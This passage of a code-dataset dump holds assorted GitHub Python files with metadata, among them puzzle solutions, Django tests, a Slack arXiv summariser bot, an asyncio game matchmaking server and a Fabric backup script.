Parameter Evolution')\nplt.legend(['M*', 'T*','L*'])\nplt.show()\n################################# Plotting Best Solution ###############################################################\nfor i in range(4):\n print([i+1, Lam[:, i].T, Pi[i]])","repo_name":"mohamed1249/Upwork-Projects","sub_path":"Dubai2/Drones 2.py","file_name":"Drones 2.py","file_ext":"py","file_size_in_byte":15745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} 
+{"seq_id":"33156642649","text":"class Solution:\n\tdef canConstruct(self, ransomNote: str, magazine: str) -> bool:\n\t\tcount = [0] * 26\n\n\t\tfor c in ransomNote:\n\t\t\tcount[ord(c)-97] += 1\n\t\t\n\t\tfor c in magazine:\n\t\t\tcount[ord(c)-97] -= 1\n\t\t\n\t\tfor c in count:\n\t\t\tif c > 0:\n\t\t\t\treturn False\n\t\t\n\t\treturn True\n","repo_name":"IamFaizanKhalid/problem-solving","sub_path":"leetcode.com/problems/ransom-note/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40943552424","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom wiki.models import Page\n\n\nclass WikiTests(TestCase):\n def test_detail_page(self):\n # Instance of user to test the pages\n user = User.objects.create()\n\n # Create a test detail page\n Page.objects.create(title=\"Test\", content=\"test content\", author=user)\n\n # Making a GET request to the home page\n res = self.client.get('/')\n\n # Very a 200 response\n self.assertEqual(res.status_code, 200)\n result = res.context['pages']\n\n # Check if we got out test page\n self.assertQuerysetEqual(\n result,\n ['']\n )\n\n def test_create_page(self):\n # Instance of user to test the pages\n user = User.objects.create()\n\n # Post data to be sent via the form\n post_data = {\n 'title': 'Test',\n 'content': 'test content',\n 'author': user.id\n }\n\n # Request to create a post\n res = self.client.post('/create/', data=post_data)\n\n # Verify our response\n self.assertEqual(res.status_code, 302)\n\n # Get object to test\n page_object = Page.objects.get(title='Test')\n\n # Check that the page object was created in the test db\n self.assertEqual(page_object.title, 'Test')\n","repo_name":"Andre-Williams22/Personal-Wiki","sub_path":"wiki/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11398308642","text":"#Michael Claveria\n#Digital factorials\n\n'''\nFind the sum of all numbers that are equal to the sum of the factorials of the digits\n'''\n\nimport math\n\n#get the sum of the digit factorials of a number n\n#for example 145 is 1! + 4! + 5! 
= 1 + (4 * 3 * 2 * 1) + (5 * 4 * 3 * 2 * 1) = 145\ndef digFactorial(n):\n    nString = str(n)\n    fSum = 0\n    for i in nString:\n        fSum += math.factorial(int(i))\n    return fSum\n\n#Sum the curious numbers from 3 to span, printing each one found\ndef findCurious(span):\n    cSum = 0\n    for i in range(3, span + 1):\n        if digFactorial(i) == i:\n            print(i)\n            cSum += i\n    return cSum\n\nprint('final sum is', findCurious(1000000))\n","repo_name":"mclaveria/Project_Euler","sub_path":"Problem034_Digit_Factorials.py","file_name":"Problem034_Digit_Factorials.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73869448781","text":"from sympy import *\n\ninit_printing(use_unicode=True)\n\n# Spatial variable\nx = Symbol(\"x\", real=True)\n\n# Domain length\nL = Symbol(\"L\", real=True, positive=True)\n\n\n# Setup linear element\nNelements = 2 \nNnodes = Nelements + 1\n\n# Setup the grid\nxnodes = [Integer(0), L/3, L] # I use Integer(0) to make sure that all xnodes are SymPy objects\nh = [xnodes[i+1]-xnodes[i] for i in range(Nnodes-1)]\n\nassert(len(xnodes) == Nnodes)\nassert(len(h) == Nelements)\n\n\n# Setup basis functions\nNfuncs = []\n\n# First\ncond1 = (x >= xnodes[0]) & (x <= xnodes[1])\nf1 = (xnodes[1] - x)/h[0]\nNfuncs.append( Piecewise( (f1, cond1), (0, True) ) )\n\n# Second\ncond1 = (x >= xnodes[0]) & (x <= xnodes[1])\nf1 = ( x - xnodes[0])/h[0]\n#\ncond2 = (x >= xnodes[1]) & (x <= xnodes[2])\nf2 = (xnodes[2] - x)/h[1]\n#\nNfuncs.append( Piecewise( (f1, cond1), (f2, cond2), (0, True) ) )\n\n","repo_name":"f-fathurrahman/ffr-MetodeNumerik","sub_path":"simple_FEM_sympy/codes/setup_problem_01.py","file_name":"setup_problem_01.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"41963161957","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . 
import views\n\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),\n    url(r'^viewTodo$', views.view_todo),\n    url(r'^addToTodo/(?P<id>[1-9]+)/$', views.create_todo),\n    url(r'^deleteTodo/(?P<id>[1-9]+)/$', views.delete_todo),\n    url(r'^completeTodo/(?P<id>[1-9]+)/$', views.complete_todo),\n    url(r'^viewList$', views.view_lists),\n    url(r'^addToList$', views.create_list),\n    url(r'^deleteList/(?P<id>[1-9]+)/$', views.delete_list),\n    url(r'^newList$', views.view_list_form),\n    url(r'^editList/(?P<id>[1-9]+)/$', views.edit_list_form),\n    url(r'^editTodo/(?P<id>[1-9]+)/$', views.edit_todo_form),\n    url(r'^changeList/(?P<id>[1-9]+)/$', views.edit_list),\n    url(r'^changeTodo/(?P<id>[1-9]+)/$', views.edit_todo),\n\n    #User accounts stuff\n\n\n]\n","repo_name":"ironbila/Scenario1","sub_path":"project-dir/project-dir/backend/todolist/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"28006325456","text":"n = int(input())\nvotes = {}\nfor i in range(n):\n    s = input()\n    if s in votes:\n        votes[s] += 1\n    else:\n        votes[s] = 1\n\nans = max(votes, key=votes.get)\nprint(ans)","repo_name":"kaneda05/AtCoder","sub_path":"conpe/ABC231/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"43199558587","text":"from base64 import b64decode\n\nfrom datetime import datetime\nfrom dateutil import parser\n\n__all__ = ['Attachment']\n\n\nclass Attachment(object):\n    def __init__(self, name, content, outlook_id=None, size=None, last_modified=None, content_type=None):\n        # type: (str, str, str, int, datetime, str) -> None\n        self.name = name\n\n        self._content = content\n        self.bytes = b64decode(content)\n\n        self.outlook_id = outlook_id\n        self.size = size\n        self.last_modified = last_modified\n        self.content_type = content_type\n\n    def __str__(self):\n        return self.name\n\n    def __repr__(self):\n        return self.name\n\n    @classmethod\n    def json_to_attachment(cls, account, api_json):\n        outlook_id = api_json.get('Id')\n        name = api_json.get('Name')\n\n        content = api_json.get('ContentBytes', None)\n        size = api_json.get('Size', None)\n        content_type = api_json.get('ContentType', None)\n\n        last_modified = api_json.get('LastModifiedDateTime', None)\n        if last_modified is not None:\n            # convert the ISO timestamp string into a datetime\n            last_modified = parser.parse(last_modified, ignoretz=True)\n\n        return Attachment(name, outlook_id=outlook_id, content=content, size=size,\n                          content_type=content_type, last_modified=last_modified)\n\n    @classmethod\n    def json_to_attachments(cls, account, api_json):\n        return [cls.json_to_attachment(account, value) for value in api_json['value']]\n\n    def api_representation(self):\n        \"\"\" Used for uploading attachments - less information is required than what we receive from the API \"\"\"\n        return {'@odata.type': '#Microsoft.OutlookServices.FileAttachment', 'Name': self.name,\n                'ContentBytes': self._content}\n","repo_name":"JensAstrup/pyOutlook","sub_path":"pyOutlook/core/attachment.py","file_name":"attachment.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"47"}
+{"seq_id":"42760225096","text":"import sys\nfrom collections import deque\n\ns = []\nfor _ in range(4) :\n    s.append(deque(list(input())))\n\nk = int(input())\nR = [list(map(int,input().split())) for _ in range(k)]\n\ndef check_right(num, dir) :\n    if num > 3 :\n        return \n    \n    if s[num][6] != s[num-1][2] :\n        
check_right(num + 1, -dir)\n    s[num].rotate(dir)\n\n\ndef check_left(num, dir) :\n    if num < 0 :\n        return \n\n    if s[num][2] != s[num+1][6] :\n        check_left(num - 1, -dir)\n    s[num].rotate(dir)\n\n\nfor i in range(k) :\n    num = R[i][0] - 1\n    direction = R[i][1]\n\n    check_right(num + 1, -direction)\n    check_left(num - 1, -direction)\n\n    s[num].rotate(direction)\n\n\nanswer = 0\n\nif s[0][0] == \"1\" :\n    answer += 1\nif s[1][0] == '1' :\n    answer += 2\nif s[2][0] == '1' :\n    answer += 4\nif s[3][0] == '1' :\n    answer += 8\n\nprint(answer)\n","repo_name":"TwinkleRing/Backjoon-Study","sub_path":"9주차 문제 풀이/14891(톱니 바퀴).py","file_name":"14891(톱니 바퀴).py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"27258709960","text":"import os\nimport sys\nimport numpy as np\n\nclass combine_fit:\n\n    def __init__(self, objectives, weights = None):\n        self.objectives = objectives\n        if weights is None:\n            self.weights = np.zeros((len(objectives)), dtype = 'float64')\n            self.weights[:] = 1.0/len(objectives)\n        else:\n            assert len(self.objectives) == len(weights)\n            self.weights = np.array(weights)\n        return\n\n    def initialize(self, pd, ref):\n        for i in range(len(self.objectives)):\n            self.objectives[i].initialize(pd, ref)\n        self.msds = np.zeros((len(self.objectives)), dtype = 'float64')\n        self.cycle = 0\n        self.fdiagnostics = open('combine_fit.punch', 'w')\n        return\n\n    def __call__(self):\n        self.a_msds = []\n        for i in range(len(self.objectives)):\n            self.msds[i], a_msd = self.objectives[i].__call__()\n            #self.a_msds.append(a_msd)\n            self.a_msds += a_msd\n        self.msd = np.sum(self.msds * self.weights)\n        self.fdiagnostics.write('%s %6.6f\\n' % (self.cycle, self.msd))\n        self.cycle += 1\n        return self.msd, self.a_msds\n","repo_name":"hopefulp/sandbox","sub_path":"Archive_sand/MOF_plus/ff_gen/ff_gen/objectives/combine_fit.py","file_name":"combine_fit.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"32115833083","text":"import pytest\nfrom django.test import override_settings\n\nfrom tests.factories.pages import TranslatablePageFactory, WagtailPageFactory\nfrom tests.factories.sites import SiteFactory, create_site_tree\nfrom wagtailtrans.templatetags import translations_wagtail_admin, wagtailtrans_tags\n\n\n@pytest.mark.django_db\nclass TestWagtailtransTags:\n\n    def test_get_translations_util(self, languages):\n        pages = create_site_tree(languages[0])\n        site = pages[0].get_site()\n        for language in languages[1:]:\n            create_site_tree(language, site=site)\n\n        translations = wagtailtrans_tags._get_translations(pages[1])\n        language_codes = [l.code for l in translations.keys()]\n        assert 'en' in language_codes\n        assert 'es' in language_codes\n        assert 'fr' in language_codes\n        assert 'de' in language_codes\n        assert 'nl' in language_codes\n\n        translations = wagtailtrans_tags._get_translations(pages[1], include_self=False)\n        language_codes = [l.code for l in translations.keys()]\n        assert 'en' not in language_codes\n        assert 'es' in language_codes\n        assert 'fr' in language_codes\n        assert 'de' in language_codes\n        assert 'nl' in language_codes\n\n    def test_get_translations(self, languages):\n        site = SiteFactory()\n        pages = create_site_tree(languages[0], site=site)\n        for language in languages[1:]:\n            create_site_tree(language, site=site)\n\n        assert not hasattr(pages[0], 'language')\n        translations = wagtailtrans_tags._get_translations(pages[0])\n\n        
language_codes = [l.code for l in translations.keys()]\n assert language_codes[0] == 'en'\n assert language_codes[1] == 'es'\n assert language_codes[2] == 'fr'\n assert language_codes[3] == 'de'\n assert language_codes[4] == 'nl'\n\n\n@pytest.mark.django_db\ndef test_get_canonical_pages_for_delete(languages):\n page = create_site_tree(languages[0])[1]\n for lang in languages[1:]:\n page.create_translation(lang, copy_fields=True)\n\n canonical_pages = translations_wagtail_admin.get_canonical_pages_for_delete(page)\n assert page not in canonical_pages\n assert languages[1:].count() == canonical_pages.count()\n\n non_canocial_page = WagtailPageFactory(path='/root')\n assert not translations_wagtail_admin.get_canonical_pages_for_delete(non_canocial_page)\n\n with override_settings(WAGTAILTRANS_SYNC_TREE=False):\n assert not translations_wagtail_admin.get_canonical_pages_for_delete(page)\n","repo_name":"wagtail/wagtailtrans","sub_path":"tests/unit/test_templatetags.py","file_name":"test_templatetags.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"47"} +{"seq_id":"37927968190","text":"import os\nimport re\n\nimport config\nimport user_interfaces\nimport utils\nfrom arxiv import SortCriterion\nfrom dotenv import load_dotenv\nfrom exceptions import DocumentAlreadyVectorizedException\nfrom models import DocumentHandler, Searcher\nfrom slack_bolt import Ack, App, BoltContext, Say\nfrom slack_bolt.adapter.socket_mode import SocketModeHandler\nfrom slack_sdk.models.blocks import ContextBlock, MarkdownTextObject\nfrom slack_sdk.web.client import WebClient\n\n# load secret tokens to environmental variables\nload_dotenv(dotenv_path=\".env\")\n# Initialize app with BOT_TOKEN\napp = App(token=os.environ.get(\"SLACK_BOT_TOKEN\"))\n\n# initialize utility classes\ndoc_handler = DocumentHandler(\n llm_model_name_or_path=config.LLM_MODEL_NAME_OR_MODEL_PATH,\n deepl_token=os.environ[\"DEEPL_AUTH_TOKEN\"],\n)\nsearcher = Searcher(initial_query=config.INITIAL_QUERY)\n\n\n# open modal when command is issued\n@app.command(\"/searchnow\")\ndef searchnow(\n ack: Ack,\n body: dict,\n client: WebClient,\n context: BoltContext,\n):\n ack()\n modal = user_interfaces.SelectSearchMethodModal()\n # save channel_id as a session variable.\n # channel_id should be embedded in modal every time\n # so that channel_id can be retrievable in later handlers.\n modal.private_metadata = context.channel_id\n client.views_open(trigger_id=body[\"trigger_id\"], view=modal)\n\n\n# change input areas of the modal when radio button is selected\n@app.action(\"search_method-select-action\")\ndef update_search_modal(\n ack: Ack,\n body: dict,\n client: WebClient,\n):\n ack()\n\n channel_id = body[\"view\"][\"private_metadata\"]\n action = body[\"actions\"][0]\n search_type: str = action[\"selected_option\"][\"value\"]\n if search_type == \"search_with_url\":\n modal = user_interfaces.SearchThesisWithURLModal()\n modal.private_metadata = channel_id\n client.views_update(\n view_id=body[\"view\"][\"id\"],\n hash=body[\"view\"][\"hash\"],\n view=modal,\n )\n elif search_type == \"search_with_conditions\":\n modal = user_interfaces.SearchThesisWithConditionsModal()\n modal.private_metadata = channel_id\n client.views_update(\n view_id=body[\"view\"][\"id\"],\n hash=body[\"view\"][\"hash\"],\n view=modal,\n )\n\n\n# receive submission of the modal\n@app.view(re.compile(\"modal_search_thesis_with_.+\"))\ndef handle_search_modal(ack: Ack, view: dict, body: 
dict, client: WebClient, say: Say):\n ack()\n\n user_id: str = body[\"user\"][\"id\"]\n channel_id: str = view[\"private_metadata\"]\n search_type: str = view[\"callback_id\"]\n if search_type == \"modal_search_thesis_with_url\":\n thesis_url: str = view[\"state\"][\"values\"][\"thesis-url-input-block\"][\n \"url-input-action\"\n ][\"value\"]\n if not thesis_url.startswith(\"https://arxiv.org/abs/\"):\n say(\n channel=channel_id,\n text=\"URLは `https://arxiv.org/abs/xxxx.xxxxx` の形式で指定してください。\",\n blocks=[\n ContextBlock(\n elements=[\n MarkdownTextObject(\n text=\"URLは `https://arxiv.org/abs/xxxx.xxxxx` の形式で指定してください。\"\n )\n ]\n ),\n ],\n )\n return\n\n thesis_id = thesis_url.split(\"/\")[-1]\n docs = searcher.search(id_list=[thesis_id])\n if not docs:\n say(\n channel=channel_id,\n text=f\"IDが `{thesis_id}` の論文が見つかりませんでした。\",\n blocks=[\n ContextBlock(\n elements=[\n MarkdownTextObject(\n text=f\"IDが `{thesis_id}` の論文が見つかりませんでした。\"\n )\n ]\n ),\n ],\n )\n return\n\n client.chat_postEphemeral(\n channel=channel_id, user=user_id, text=\"論文を要約しています。少しお待ちください。\"\n )\n doc = doc_handler.summarize_documents(docs)[0]\n say(\n channel=channel_id,\n text=doc.arxiv_doc.title,\n blocks=doc.get_formatted_message(),\n )\n elif search_type == \"modal_search_thesis_with_conditions\":\n (\n query,\n max_results,\n ) = utils.get_query_and_max_desired_results_from_modal_submission(\n response_view=view\n )\n docs = searcher.search(\n query=query, max_results=max_results, sort_by=SortCriterion.Relevance\n )\n if not docs:\n say(\n channel=channel_id,\n text=\"条件に合致する論文が見つかりませんでした。\",\n blocks=[\n ContextBlock(\n elements=[MarkdownTextObject(text=\"条件に合致する論文が見つかりませんでした。\")]\n ),\n ],\n )\n return\n\n client.chat_postEphemeral(\n channel=channel_id, user=user_id, text=\"論文を要約しています。少しお待ちください。\"\n )\n docs = doc_handler.summarize_documents(docs=docs)\n for doc in docs:\n say(\n channel=channel_id,\n text=doc.arxiv_doc.title,\n blocks=doc.get_formatted_message(),\n )\n\n\n@app.action(\"discuss-button-action\")\ndef process_document_for_discussion(ack: Ack, body: dict, say: Say):\n ack()\n\n thread_id = body[\"message\"][\"ts\"]\n thesis_id = body[\"actions\"][0][\"value\"]\n\n say(text=f\"<@{body['user']['id']}> 論文を熟読しています。しばらくお待ちください...\", thread_ts=thread_id)\n\n try:\n doc_handler.convert_pdf_into_vector_db(thread_id=thread_id, thesis_id=thesis_id)\n except DocumentAlreadyVectorizedException as e:\n print(e)\n say(\n text=f\"<@{body['user']['id']}> この論文はすでに読み込んであります! このbotをメンションして何でも聞いてください。\",\n thread_ts=thread_id,\n )\n else:\n say(\n text=f\"<@{body['user']['id']}> 準備ができました! 
このbotをメンションして何でも聞いてください。\",\n thread_ts=thread_id,\n )\n\n\n@app.event(\"app_mention\")\ndef talk_about_document(event: dict, context: BoltContext, say: Say):\n # ignore unrelated messages\n if \"thread_ts\" not in event:\n return\n if not context.channel_id:\n return\n\n # remove mention symbol from text\n question = re.sub(pattern=\"<@.+>\", repl=\"\", string=event[\"text\"])\n thread_id = event[\"thread_ts\"]\n try:\n answer, source_docs = doc_handler.answer_question_with_source_documents(\n thread_id=thread_id, question=question\n )\n except FileNotFoundError: # when vector db was not found for this thesis\n say(text=\"まだこの論文はちゃんと読んでいないようです。先にDiscuss it!ボタンを押してください。\", thread_ts=thread_id)\n else:\n source_pages = [doc.metadata[\"page\"] + 1 for doc in source_docs]\n source_pages = map(str, sorted(list(set(source_pages))))\n say(\n text=f\"[ 回答の参考にしたページ: {','.join(source_pages)} ]\\n\" + answer,\n thread_ts=thread_id,\n )\n\n\nif __name__ == \"__main__\":\n SocketModeHandler(app, os.environ[\"SLACK_APP_TOKEN\"]).start()\n","repo_name":"t0d4/arxiv-slack-bot","sub_path":"arxiv-slack-bot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"69861717263","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom chat_bot.qa_handler import ask_question\nfrom pydantic import BaseModel, Field\n\n\napp = FastAPI()\n\norigins = [\"http://localhost:8080\"]\n\n#CORSを回避\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nclass Message(BaseModel):\n text: str = Field(title=\"Request message to LLM.\", max_length=1000)\n\nclass LLMResponse(BaseModel):\n text: str\n\n@app.get(\"/test\")\ndef test():\n return {}\n\n@app.post(\"/llm\")\ndef response (message:Message) ->LLMResponse:\n answer = ask_question(message.text)\n return LLMResponse(text=answer)\n ","repo_name":"shunX03/sn-langchain","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72565822223","text":"def part1():\n file = open('day1.dat', 'r')\n lines = file.readlines()\n\n lastNumber = 100000\n\n count = 0\n\n for line in lines:\n number = int(line.strip())\n\n if number > lastNumber:\n count = count + 1\n\n lastNumber = number\n\n print(\"Part 1: \" + str(count))\n\n\ndef part2():\n # Step 1: Create a new array of \"triplets\"\n sums = []\n\n file = open('day1.dat', 'r')\n lines = file.readlines()\n\n for i in range(2, len(lines), 1):\n total = int(lines[i]) + int(lines[i - 1]) + int(lines[i - 2])\n sums.append(total)\n\n # Step 2: Now analyze those triplets\n lastSum = 100000\n\n count = 0\n\n for sum in sums:\n if sum > lastSum:\n count = count + 1\n\n lastSum = sum\n\n print(\"Part 2: \" + str(count))\n\n\npart1()\npart2()","repo_name":"bciccolo/AoC-2021","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35992166115","text":"import asyncio\nfrom _thread import *\nfrom matching_data_structure import *\nimport time\n\nHOST = '0.0.0.0'\nPORT = 3098\nTRY_MATCH = 0\nRETRY_MATCH = 1\nFIRST_PLAYER = 1\nSECOND_PLAYER = 2\n\n\nclass Lobby:\n def __init__(self):\n self.matching_list = [] # 매칭 요청한 유저들 담을 큐 객체\n 
self.user_list = [] # 서버에 접속한 유저 소켓 저장할 리스트\n self.room_num = 1\n self.accept_dic = {}\n\n print(\"start matching queue\")\n asyncio.run(self.main())\n\n # 매칭 잡힘\n async def matching_catch_thread(self, my_write, opponent_write):\n try:\n print(\"유저id : \" + str(my_write[1]) + str(opponent_write[1]))\n response = MatchingResponseData(PacketId.matching_response.value,\n MatchingPacketId.matching_catch.value,\n MatchingResult.success.value,\n my_write[1]).serialize()\n my_write[0].write(response)\n await my_write[0].drain()\n\n response = MatchingResponseData(PacketId.matching_response.value,\n MatchingPacketId.matching_catch.value,\n MatchingResult.success.value,\n opponent_write[1]).serialize()\n opponent_write[0].write(response)\n await opponent_write[0].drain()\n\n times = 0\n while times < 20:\n await asyncio.sleep(0.3)\n # 둘다 매칭 수락함.\n print(\"시간 대기중 : \" + str(self.accept_dic[my_write[1]]) + \" \" + str(self.accept_dic[opponent_write[1]]))\n if self.accept_dic[my_write[1]] == 1 and self.accept_dic[opponent_write[1]] == 1:\n await self.accept_response(my_write, opponent_write)\n return 0\n times += 1\n\n # 10초가 지나면\n # 내가 수락 상대방 거절\n if self.accept_dic[my_write[1]] == 1 and (self.accept_dic[opponent_write[1]] == 0 or\n self.accept_dic[opponent_write[1]] == -1):\n await self.retry_request_matching(my_write[0])\n await self.reject_response(opponent_write[0])\n\n # 내가 거절 상대방 수락\n elif self.accept_dic[opponent_write[1]] == 1 and (self.accept_dic[my_write[1]] == 0 or\n self.accept_dic[my_write[1]] == -1):\n await self.retry_request_matching(opponent_write[0])\n await self.reject_response(my_write[0])\n # 둘다 거절\n else:\n await self.reject_response(my_write[0])\n await self.reject_response(opponent_write[0])\n except Exception as e:\n print(\"매칭 도중 유저 나감\")\n self.matching_remove(my_write, opponent_write)\n\n # 매칭 쓰레드\n async def matching_queue_thread(self):\n while True:\n await asyncio.sleep(0.1)\n time.sleep(0.5)\n if len(self.matching_list) >= 2:\n #유저 추출\n users = []\n users.append(self.matching_list[0])\n del self.matching_list[0]\n users.append(self.matching_list[0])\n del self.matching_list[0]\n\n #매칭된 두 유저 dic 0으로 초기화 -> 클라이언트로부터 수락 요청시 1, 거절 요청시 -1 처리\n self.accept_dic[users[0][1]] = 0\n self.accept_dic[users[1][1]] = 0\n asyncio.create_task(self.matching_catch_thread(users[0], users[1])) #0: writer 1: id\n print(\"매칭 잡힘\")\n\n # 상대방 거절 이후 재매칭\n async def retry_request_matching(self, retry_user):\n for user in self.user_list: #모든 유저 리스트\n if user[1] == retry_user:\n await self.request_matching(user[1], user[2], RETRY_MATCH)\n\n # 매칭 둘다 완료\n async def accept_response(self, my_write, opponent_write):\n message = MatchingCompleteData(PacketId.matching_complete.value,\n self.room_num,\n my_write[1],\n FIRST_PLAYER).serialize()\n my_write[0].write(message)\n message = MatchingCompleteData(PacketId.matching_complete.value,\n self.room_num,\n opponent_write[1],\n SECOND_PLAYER).serialize()\n opponent_write[0].write(message)\n self.room_num += 1 #각 방번호 부여\n\n # 매칭 거절\n async def reject_response(self, writer):\n #매칭 잡힌 후 10초뒤에 전달되는 메시지\n message = MatchingRejectData(PacketId.matching_reject.value, MatchingResult.success.value).serialize()\n writer.write(message)\n await writer.drain()\n\n # 매칭 소켓 핸들러\n async def lobby_handle(self, reader, writer):\n addr = writer.get_extra_info('peername') # 0: IP 1: PORT\n print(str(addr[0]) + \" \" + str(addr[1]) + \"connect\")\n user_id = await reader.read(100)\n user_id = user_id.decode()\n print(\"userid : \" + str(int(user_id)))\n 
self.user_list.append([reader, writer, int(user_id)])\n\n while True:\n try:\n message = await reader.read(100)\n if not message:\n self.remove(int(user_id))\n break\n await self.divide_process(int.from_bytes(message[0:4], byteorder='big'), message, writer, int(user_id))\n except Exception as e:\n print(e)\n #remove\n break\n\n # 메세지 처리\n async def divide_process(self, packet_id, message, writer, user_id):\n # 클라이언트로부터 매칭 시작 요청\n if packet_id == PacketId.matching_data.value:\n packet_data = MatchingData(message).deserialize()\n if packet_data[1] == MatchingPacketId.matching_request.value:\n print(str(user_id) + \" : 매칭 요청\")\n await self.request_matching(writer, user_id, TRY_MATCH)\n # 클라이언트로부터 매칭 수락, 거절 여부 메시지\n elif packet_id == PacketId.matching_decision.value:\n\n packet_data = MatchingDecisionData(message).deserialize()\n #수락 눌렀을 시\n if packet_data[1] == MatchingDecision.matching_accept.value:\n print(\"수락\")\n self.accept_matching(packet_data)\n elif packet_data[1] == MatchingDecision.matching_reject.value:\n print(\"거절\")\n self.reject_matching(packet_data)\n # 클라이언트로부터 매칭 취소\n elif packet_id == PacketId.matching_cancel.value:\n self.cancel_matching(user_id)\n\n # 매칭 등록\n async def request_matching(self, writer, user_id, match_type):\n self.matching_list.append([writer, user_id]) # 매칭 요청 유저 리스트에 삽입\n # response 전송\n if match_type == TRY_MATCH: # 매칭 요청으로 매칭 메세지 전송\n response = MatchingResponseData(PacketId.matching_response.value,\n MatchingPacketId.matching_response.value,\n MatchingResult.success.value,\n user_id).serialize()\n print(\"matching regist\")\n writer.write(response)\n await writer.drain()\n elif match_type == RETRY_MATCH: # 상대방이 거절한 유저 재매칭 메세지 전송\n response = MatchingRetryData(PacketId.matching_retry.value, MatchingResult.success.value).serialize()\n writer.write(response)\n await writer.drain()\n\n print(str(user_id) + \" : 매칭 ���답 전송\")\n\n # 매칭 수락\n def accept_matching(self, packet_data):\n self.accept_dic[packet_data[2]] = 1 #수락했다고 알림\n print(str(packet_data[2]) + \" : 매칭 수락\")\n\n # 매칭 거절\n def reject_matching(self, packet_data):\n self.accept_dic[packet_data[2]] = -1 #거절했다 알림\n print(str(packet_data[2]) + \" : 매칭 거절\")\n\n # 매칭 취소\n def cancel_matching(self, user_id):\n for user in self.matching_list:\n if user[1] is user_id:\n self.matching_list.remove(user)\n print(str(user_id) + \" : 매칭 취소 처리\")\n\n async def main(self):\n asyncio.create_task(self.matching_queue_thread())\n server = await asyncio.start_server(self.lobby_handle, HOST, PORT)\n\n address = server.sockets[0].getsockname()\n print({address})\n\n print('Lobby server start')\n print('waiting new client..')\n\n async with server:\n await server.serve_forever()\n\n # 접속 종료 유저 리스트 제거\n def remove(self, user_id):\n for user in self.matching_list:\n if user[1] == user_id:\n print(str(user[1]) + \"님이 매칭 리스트에서 나가셨습니다.\")\n self.matching_list.remove(user)\n break\n for user in self.user_list:\n if user[2] == user_id:\n print(str(user[2]) + \"님이 나가셨습니다.\")\n self.user_list.remove(user)\n break\n\n def matching_remove(self, my, opponent):\n for user in self.matching_list:\n if user[1] == my or user[1] == opponent:\n print(str(user[1]) + \"님이 매칭 리스트에서 나가셨습니다.\")\n self.matching_list.remove(user)\n break\nserver = Lobby()","repo_name":"serverdevcamp/camp4_sercle","sub_path":"src/server/async_lobby_server.py","file_name":"async_lobby_server.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} 
+{"seq_id":"70534919184","text":"from util import *\n\nclass Repeater:\n def __init__(self, days_delta, exceptions=[], end_date=None):\n self.days_delta = days_delta\n self.exceptions = exceptions\n self.end_date = end_date\n\n if self.days_delta == 0:\n raise InputError(\"Error: cannot have repeater that repeats every 0 days.\")\n\n def __str__(self):\n return 'Repeats every %d days%s%s' % (self.days_delta,\n (\" except for \" + stringify_dates(self.exceptions)) if self.exceptions else \"\",\n \" until \" + self.end_date.date().isoformat() if self.end_date else \"\")\n","repo_name":"asya-bergal/abercal","sub_path":"repeater.py","file_name":"repeater.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4892398237","text":"#!/usr/bin/python3\n\"\"\"\nFabric script to create a backup\n\"\"\"\nfrom fabric.api import local\nfrom fabric.api import hide\nfrom datetime import datetime\n\n\ndef do_pack():\n \"\"\"\n Create folder backup with date and tgz extension\n \"\"\"\n print(\"Packing web_static to versions/web_static_%s.tgz\" %\n (datetime.now().strftime('%Y%m%d%H%M%S')))\n\n with hide('running'):\n versions_dir = local('mkdir -p versions')\n\n tar = local('tar -cvzf versions/web_static_%s.tgz web_static/' %\n (datetime.now().strftime('%Y%m%d%H%M%S')))\n\n with hide('running'):\n file_size = local('wc -c < versions/web_static_{}.tgz'.\n format(datetime.now().strftime('%Y%m%d%H%M%S')),\n capture=True)\n\n print(\"web_static packed: versions/web_static_{:s}.tgz -> {:}Bytes\".\n format(datetime.now().strftime('%Y%m%d%H%M%S'), 